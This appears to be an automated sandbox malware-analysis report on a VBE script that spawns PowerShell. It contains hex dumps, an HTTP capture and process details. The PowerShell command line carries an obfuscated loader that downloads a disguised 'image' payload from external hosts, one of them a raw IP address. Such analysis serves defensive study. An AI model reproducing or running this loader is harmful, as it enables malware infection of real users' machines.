                                                                  2024-02-13 20:13:50 UTC1089INData Raw: 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 51 42 34 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 63 77 42 30 44 67 54 72 65 47 45 44 67 54 72 65 63 67 42 30 44 67 54 72 65 45 6b 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 65 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 69 44 67 54 72 65 47 45 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 44 59 44 67 54 72 65 4e 44 67 54 72 65 42 44 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 74 44 67 54 72 65 47 45 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 50 51 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72
                                                                  Data Ascii: o & odontogenia & infecto & "QB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTr
                                                                  2024-02-13 20:13:50 UTC1369INData Raw: 31 30 65 62 0d 0a 45 4d 44 67 54 72 65 62 77 42 74 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 4b 51 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 44 67 54 72 65 42 42 44 67 54 72 65 48 4d 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 47 30 44 67 54 72 65 59 67 42 73 44 67 54 72 65 48 6b 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 57 77 42 54 44 67 54 72 65 48 6b 44 67 54 72 65 63 77 42 30 44 67 54 72 65 47 55 44 67 54 72 65
                                                                  Data Ascii: 10ebEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTre" & infecto & odontogenia & infecto & "DgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTre
                                                                  2024-02-13 20:13:50 UTC1369INData Raw: 65 45 63 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 51 42 30 44 67 54 72 65 45 30 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 51 42 30 44 67 54 72 65 47 67 44 67 54 72 65 62 77 42 6b 44 67 54 72 65 43 67 44 67 54 72 65 4a 77 42 57 44 67 54 72 65 45 45 44 67 54 72 65 53 51 44 67 54 72 65 6e 44 67 54 72 65 43 6b 44 67 54 72 65 4c 67 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 64 67 42 76 44 67 54 72 65 47 73 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 51 44 67 54 72 65 6f 44 67 54 72 65 43 51 44 67
                                                                  Data Ascii: eEcDgTre" & infecto & odontogenia & infecto & "QB0DgTreE0DgTre" & infecto & odontogenia & infecto & "QB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTre" & infecto & odontogenia & infecto & "QDgTreoDgTreCQDg
                                                                  2024-02-13 20:13:50 UTC1369INData Raw: 6d 61 6e 69 6e 68 61 72 20 3d 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 26 20 22 74 e2 98 9f c3 b0 2a 28 e2 98 a0 22 0d 0a 20 20 20 20 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 3d 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 26 20 22 6d 2e 28 40 28 e2 97 80 28 40 c3 b8 e2 98 9e 40 e2 88 9e 22 0d 0a 20 20 20 20 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 3d 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 26 20 22 6e 76 e2 98 9f c3 b0 2a 28 e2 98 a0 72 22 0d 0a 20 20 20 20 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 3d 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 26 20 22 74 5d 3a 22 0d 0a 20 20 20 20 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 3d 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 26 20 22 3a 46 72 40 c3 b8 e2 98 9e 40 e2 88 9e 22 0d 0a 20 20 20 20 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 3d 20
                                                                  Data Ascii: maninhar = desmaninhar & "t*(" desmaninhar = desmaninhar & "m.(@((@@" desmaninhar = desmaninhar & "nv*(r" desmaninhar = desmaninhar & "t]:" desmaninhar = desmaninhar & ":Fr@@" desmaninhar =


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.649701172.67.215.454433564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-02-13 20:13:53 UTC124OUTGET /images/004/731/958/original/new_image.jpg?1707143673 HTTP/1.1
                                                                  Host: uploaddeimagens.com.br
                                                                  Connection: Keep-Alive
                                                                  2024-02-13 20:13:54 UTC693INHTTP/1.1 200 OK
                                                                  Date: Tue, 13 Feb 2024 20:13:54 GMT
                                                                  Content-Type: image/jpeg
                                                                  Content-Length: 8369614
                                                                  Connection: close
                                                                  Last-Modified: Mon, 05 Feb 2024 14:34:33 GMT
                                                                  ETag: "65c0f1f9-7fb5ce"
                                                                  Cache-Control: max-age=2678400
                                                                  CF-Cache-Status: HIT
                                                                  Age: 1183
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Uxaunf6QE4gWtfINUG1pyZeulXBOVljhsxo4GRslKY%2BeXDKKJSXLlSjkGnutVWjrPiU6LWAgcXbiM1LIR%2BweLDn5UL4Lb2RIatBGJRPJt8JinnsI7prZTdudPSLy29gcPgoO2BJB1tqi"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 854fbc0ce80e53f9-ATL
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2024-02-13 20:13:54 UTC676INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 36 32 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 39 35 0a ff db 00 43 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00
                                                                  Data Ascii: JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 95CCp"
                                                                  2024-02-13 20:13:54 UTC1369INData Raw: 00 02 11 03 11 00 3f 00 ec 41 f5 38 14 9b 87 b9 a8 d9 fd f0 29 0b 64 72 4d 7e cf 63 f2 24 bb 92 97 18 e3 83 4c dd 8f ad 33 70 02 90 9a 18 58 90 b1 f5 14 c2 de 99 35 1e ff 00 41 48 ce 7d 7f 2a 2c 57 a0 f2 7d e9 15 88 61 c8 e3 bd 47 bb 3d e9 a1 8e 70 39 a2 c2 d4 99 f0 5b 23 a7 a5 46 7a f5 e3 d2 9a 5b 07 1d 0d 37 7f bd 26 86 3f 75 37 34 9b 85 34 b6 09 e7 22 98 27 7d 81 8f 4e 73 4d 0d c8 19 f7 a0 91 d4 d2 6d 04 f4 a2 e6 97 1c ed 8f ad 30 b7 eb 41 fa e6 9a 7d 28 b8 58 70 6e 3d 68 ce 7d aa 3a 46 7e 28 b8 0f 63 c9 15 19 3e f4 c6 6e 7d e9 03 64 fb d2 b8 c9 0b 63 f9 53 1b bf 3f 85 21 6e 47 a5 04 e4 e7 b5 17 1a 42 83 8f a5 21 7c 1a 42 c7 1d a9 84 93 45 c6 d0 e2 f9 f6 a6 96 18 e0 e6 9a cd e9 4d 0e 57 b7 e9 45 c9 6b b0 f6 6c 53 0b 1c f3 cd 21 6c f5 a6 1e 09 e7 8a 68
                                                                  Data Ascii: ?A8)drM~c$L3pX5AH}*,W}aG=p9[#Fz[7&?u744"'}NsMm0A}(Xpn=h}:F~(c>n}dcS?!nGB!|BEMWEklS!lh
                                                                  2024-02-13 20:13:54 UTC1369INData Raw: 1b ab fb 29 b4 2b 2b 28 f4 c4 86 fa 19 64 79 b5 01 21 2d 70 ad ca a1 5e 83 6f 62 09 f7 15 9d cf a1 fc 7a d6 62 71 ec 26 05 06 3e 33 83 4e 0a 4f 63 52 2a 67 b5 26 c5 62 df 87 f5 eb ff 00 0b df b5 ee 9b 2a c3 72 d1 34 05 99 43 fc 8c 06 ec 02 31 9e 01 cf b5 66 95 2d b9 9d 89 76 c9 24 e4 e4 9e 4f 3f 8f 5a 98 a6 3d 40 f6 a8 8f b7 34 79 96 97 46 47 b7 04 f6 1f af 7c 51 c5 38 02 73 9e 0d 33 69 ce 33 c7 bd 03 4a c3 1b 07 38 38 a6 b4 65 71 90 09 eb ef 53 2e 41 0c 40 38 e6 96 66 32 be ec 63 da 8b 85 ae 56 da 73 e9 df 14 85 3b e2 a4 27 9a 4a 41 62 17 18 14 8a bb fb e3 eb 52 95 19 f6 a8 dd 70 38 eb 4c 08 c8 db df 34 94 1c e7 9a 2a 86 26 71 d3 ad 0c c7 6e 33 c1 e4 d2 d0 29 58 07 da dd 4f 63 3a 4f 6d 2c 90 4c 87 2b 24 67 0c 38 ec 7a f2 0e 0d 46 d9 6c b3 12 4b 72 7b f3
                                                                  Data Ascii: )++(dy!-p^obzbq&>3NOcR*g&b*r4C1f-v$O?Z=@4yFG|Q8s3i3J88eqS.A@8f2cVs;'JAbRp8L4*&qn3)XOc:Om,L+$g8zFlKr{
                                                                  2024-02-13 20:13:54 UTC1369INData Raw: b0 9b 28 03 14 b4 a1 4b 90 14 12 49 c0 c7 52 69 a7 70 dc 55 23 6d 31 7a e3 34 e9 a0 92 dd ca c8 85 18 73 82 30 79 e9 4c 0b 43 18 f3 c1 f5 a4 a0 f5 a2 a4 41 49 b7 18 a5 a2 90 00 ef f9 51 49 d0 9f 7e 69 73 52 02 30 c8 3e bd 7f 2a 61 07 07 db fc e6 9e 58 7a fb 53 c2 c4 62 72 ce 44 a3 01 40 03 1f 42 73 4d 30 20 28 47 b5 30 8c 75 a9 58 9c 8e 73 4d 35 77 1a d4 4c 71 48 46 29 d4 52 34 1b f8 52 53 99 71 4d a0 06 49 c7 6c 8a 68 19 20 74 cd 48 c3 22 a3 c6 08 3d e9 dc 63 a4 8d a3 23 3d f0 7f 0a 6d 39 9c be 37 12 69 b4 30 b0 51 45 15 24 b4 27 bd 2f 07 a5 14 54 8a c0 e0 29 c0 39 03 bf 6f 53 52 4b 6f 24 0b 13 49 1b 22 ca bb a3 66 e0 32 e7 a8 a8 f1 c8 ed fa d3 9e 59 24 08 1d d9 c2 0d aa 09 c8 51 9c f0 3b 50 2d 86 d0 14 91 9c 71 eb 45 00 9c 11 9e 0d 00 35 8f 4a 4a 07 26
                                                                  Data Ascii: (KIRipU#m1z4s0yLCAIQI~isR0>*aXzSbrD@BsM0 (G0uXsM5wLqHF)R4RSqMIlh tH"=c#=m97i0QE$'/T)9oSRKo$I"f2Y$Q;P-qE5JJ&
                                                                  2024-02-13 20:13:54 UTC1369INData Raw: c7 74 26 78 f5 3e d4 84 60 f2 30 7d e9 41 28 41 07 04 50 cc 5c 92 4e 4f 73 4c 76 13 1c 83 e9 4b d6 8e b4 01 9a 4c 96 14 51 40 19 a9 00 a5 e8 69 08 c5 28 c7 7a 00 3a 9f 53 fa d2 93 c7 4a 6d 14 00 53 4f 26 9e 46 06 73 51 f7 eb c5 3b 00 ee bc 54 67 8c f7 a9 8a 32 a0 62 08 0d 9c 66 a3 23 26 90 d0 32 6c 08 72 09 3d 87 6f ad 34 1c 0e 94 b8 c7 7a 36 d0 31 68 a5 03 34 63 9a 00 4c d2 e3 8f 7a 30 70 69 3f 43 eb 40 0a 41 53 cf 06 92 9d 92 ed c9 c9 e0 52 50 02 52 d2 51 40 0a 4e 4d 25 14 50 01 4b d8 d1 8c f6 cd 27 f5 a0 03 a7 b5 3c c8 cd 08 43 ca 83 9c fb 9e c4 d3 29 db c8 52 a0 e0 1e 71 40 00 20 0c 52 d2 75 1d 29 b4 0a c4 d0 95 66 e7 81 44 98 0e 76 fd d3 fa 54 43 fc e2 94 37 18 ed 4b 51 13 5a dd 4b 65 73 15 c4 0e 63 9e 26 0e 92 0e a0 8e 46 3e 86 8b ab 99 6f 6e 65 b8
                                                                  Data Ascii: t&x>`0}A(AP\NOsLvKLQ@i(z:SJmSO&FsQ;Tg2bf#&2lr=o4z61h4cLz0pi?C@ASRPRQ@NM%PK'<C)Rq@ Ru)fDvTC7KQZKesc&F>one
                                                                  2024-02-13 20:13:54 UTC1369INData Raw: 3e 94 d3 1e 73 e9 59 f2 95 cd a6 84 06 20 dd f8 ab 1a 7d c5 ad a3 ce 6e 6c c5 e0 78 99 50 16 c6 c7 ec c3 e9 e9 4c fb a6 a2 6e fc 71 52 e3 7d 0a 8c fb 95 59 0a e3 27 24 67 9f 6c f4 fc 29 09 dc 0f 3c 54 ae be b5 11 e3 e9 43 89 5c c4 64 1c 54 4c 4e 7d fd aa 7e 49 03 af f2 a6 32 64 e4 71 df 1d 0d 67 cb 62 ae 44 ec 64 cb 1e 4f 1f 87 61 51 b8 c9 03 03 03 8c fa fe 95 af a2 59 e9 57 97 12 c7 ab de cf 61 07 94 4c 72 43 0f 9b 96 03 20 11 91 d4 f7 1f 8d 64 90 4e 33 d4 fb e6 96 fa 58 3a 27 71 98 23 34 d6 e7 f0 a9 48 e6 98 47 07 d6 97 2d f5 05 2b 11 18 9b 1b f1 f2 8e fd b9 f4 a7 45 75 3d ba 4f 1c 52 c9 1c 73 28 49 55 18 81 20 c8 60 08 cf 62 a0 e3 da 9c 77 79 7b 4b 1c 75 c7 6a 41 19 72 06 ec 13 c6 71 ef 59 b5 dc d6 32 b1 58 a8 07 39 cf e1 8a 42 39 ab 37 11 04 90 85 7d
                                                                  Data Ascii: >sY }nlxPLnqR}Y'$gl)<TC\dTLN}~I2dqgbDdOaQYWaLrC dN3X:'q#4HG-+Eu=ORs(IU `bwy{KujArqY2X9B97}
                                                                  2024-02-13 20:13:54 UTC1369INData Raw: 1c d4 15 af 69 e1 8d 6f 55 d1 ef 35 5b 4d 26 fe ef 4a b1 4d d7 37 b1 5b bb c3 00 c8 19 77 00 85 e4 81 92 47 5a c7 62 01 3d ea 53 12 ba dd 06 05 35 93 34 b9 34 31 20 0a 63 63 0e 7b d2 1c f6 a7 9e 94 d2 31 c8 e6 82 2c 46 d4 da 71 5e 49 f5 a6 d3 6a c6 97 10 8a 6e 39 cd 3e 82 b9 e9 52 2d 44 dd d3 d2 95 79 e4 f4 a3 67 bd 38 2f 1c 9a 42 b7 50 18 26 9b 9c 11 e9 4f a4 20 1f ad 22 6e 35 fd 47 43 4d a9 31 81 eb 4d c0 eb de 90 c6 91 8a 5c f1 47 5f 6a 4a 56 13 0f c6 91 85 2d 07 9a a1 0c a4 e0 1a 7e 38 a4 29 4c 62 66 93 22 8c 60 1a 6d 21 8a 06 69 d4 8b 8c d3 8f 26 9d ae 26 46 c4 12 2a 32 31 f4 a7 9e a6 9a 46 69 1a 21 b4 e1 d2 9b d2 95 68 b0 c5 c0 a5 a2 8a 57 10 51 40 19 a3 06 98 08 46 45 20 e2 9d 4d 2a 73 c0 e2 93 57 01 43 98 f0 ca 79 f5 a1 55 ee a4 24 f2 79 3c 9a 6b
                                                                  Data Ascii: ioU5[M&JM7[wGZb=S5441 cc{1,Fq^Ijn9>R-Dyg8/BP&O "n5GCM1M\G_jJV-~8)Lbf"`m!i&&F*21Fi!hWQ@FE M*sWCyU$y<k
                                                                  2024-02-13 20:13:54 UTC1369INData Raw: 98 31 c8 03 27 38 ef 83 8a 87 38 5e 9f 37 ad 0c 41 01 71 83 eb 48 03 94 f9 7e f2 83 9c 76 34 ce 9e e7 d4 f7 a7 e4 91 d3 81 4d e4 9a 00 50 c7 69 18 07 3c d2 d3 48 c1 e9 8a 4a 60 14 ac 39 f5 1d 69 2a 7b 79 a1 88 c8 66 b7 17 20 a1 55 05 b6 ed 3d 01 e9 ce 3d 0d 20 2b 36 01 3f 97 f2 e2 95 d3 68 1c 83 9e 78 39 e2 93 90 3a e4 f4 e4 63 38 f6 f7 a3 df 02 a8 61 8c 9c 01 9f c2 97 1c fa 52 2b 94 60 c0 e0 8a 7c 8a 11 b3 bb 70 6e 4f b1 a0 69 dc 65 25 1d 68 eb 42 10 30 c0 fc 85 03 a5 48 11 1a 12 de 61 12 e7 01 70 70 47 ae 7a 54 63 8a 05 b1 25 b4 6f 34 f1 c2 9b 43 cc c1 01 73 b4 02 4f 73 d0 63 b9 35 36 a7 a7 be 8f a9 5e d8 5c 98 e5 9e da 47 81 9e 07 de 85 83 60 95 6e 84 1c 13 91 55 18 02 08 c6 41 1d 3b 7b f6 a4 c7 40 09 03 d4 ff 00 85 48 05 2b a1 45 56 e0 e7 b0 e4 fa 72
                                                                  Data Ascii: 1'88^7AqH~v4MPi<HJ`9i*{yf U== +6?hx9:c8aR+`|pnOie%hB0HappGzTc%o4CsOsc56^\G`nUA;{@H+EVr
                                                                  2024-02-13 20:13:54 UTC1369INData Raw: 18 1e f5 4b 70 6a e2 83 8e e3 f3 a0 b0 ff 00 eb f6 a6 10 00 a9 9e 55 78 76 84 e0 7a 7f 5a 2c 2b 11 b8 ef 8c 7d 69 94 a4 9e 99 cd 25 0b 41 86 06 d3 eb 4a 47 71 d2 92 81 9e 79 a6 0d d8 fd 3f 27 23 af e5 4d dc 3d 79 a6 ee da 28 c8 3c 7f 5a fd 54 fc c0 52 41 3f d6 9a cd cf 14 3f 4c 0e 95 19 c8 a0 64 aa c0 8a 1a a2 59 01 c0 e9 cd 38 9c 9a 96 52 06 27 a7 43 51 96 39 f4 a7 13 c6 3b fa d4 79 e7 d4 fb 55 14 3b 27 14 9d 4d 29 6a 6e 7a d4 dc 60 cd 9e 07 d2 9b 4a 48 22 9a 4e de b4 ee c6 0c 7d e9 9b cd 0e db 87 14 d3 c7 d6 8d f5 01 c5 89 a6 e7 9a 32 7f 1a 6e 69 8f 71 dd 7b 67 14 d2 c0 03 c7 b5 21 6e 7a f2 69 a4 d4 ee 3b 0a c4 1c 71 82 3b d3 77 0a 4d d4 83 19 eb 4f 41 b1 c5 f0 38 18 3e f4 dd f9 ed f9 50 dc 03 de 9b cf a5 48 58 7b 30 e3 1d 69 84 f7 c6 4d 1d e9 ac 79 a2
                                                                  Data Ascii: KpjUxvzZ,+}i%AJGqy?'#M=y(<ZTRA??LdY8R'CQ9;yU;'M)jnz`JH"N}2niq{g!nzi;q;wMOA8>PHX{0iMy
                                                                  2024-02-13 20:13:54 UTC1369INData Raw: 4f b9 a0 f0 7a 53 1c 77 eb 4a dd 4d 2e 44 45 37 6e 78 03 27 ad 48 41 27 a8 a3 26 3c 15 1c ff 00 3a 42 4c 8c 85 f2 0e 50 97 27 86 e4 0a 60 1c 9f 41 fe 7f 4a b9 2d f1 96 d1 61 28 06 09 39 ee 6a a0 3c 1f cf e9 48 ad c4 00 b6 00 19 3d 3d 73 48 c4 90 46 30 7a 54 d6 f2 08 5c 31 19 e7 38 fc 29 92 c9 e6 39 38 c6 79 fe 75 22 5b 11 03 8a 61 39 3c 8c 0a 97 23 69 f5 a8 c8 a2 d7 1a 18 c3 06 92 94 f2 71 e9 49 cf a5 05 ad 03 3d e8 0d ef ed ed 9f 4c d3 a0 88 4d 3c 51 17 58 83 ba ae f7 e0 2e 4f 24 9f 41 9e 6a e6 bb a5 26 8b a9 cb 69 1d fd b6 a4 88 01 fb 4d 99 cc 6d 91 c8 07 db a1 c5 4f 5b 15 7d 2e 55 56 07 d0 1a 31 92 73 f4 a8 b1 f9 55 80 50 5b 9e 3e 7c e6 80 4f b9 1e de 69 ac 36 d2 6e 3b a8 63 91 4a c3 43 93 c9 00 6e 2c 5b 18 f6 14 d6 c7 f0 d3 29 56 a6 d6 2c 69 53 ef 52
                                                                  Data Ascii: OzSwJM.DE7nx'HA'&<:BLP'`AJ-a(9j<H==sHF0zT\18)98yu"[a9<#iqI=LM<QX.O$Aj&iMmO[}.UV1sUP[>|Oi6n;cJCn,[)V,iSR


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:21:13:48
                                                                  Start date:13/02/2024
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\dereac.vbe"
                                                                  Imagebase:0x7ff60f410000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:21:13:50
                                                                  Start date:13/02/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEU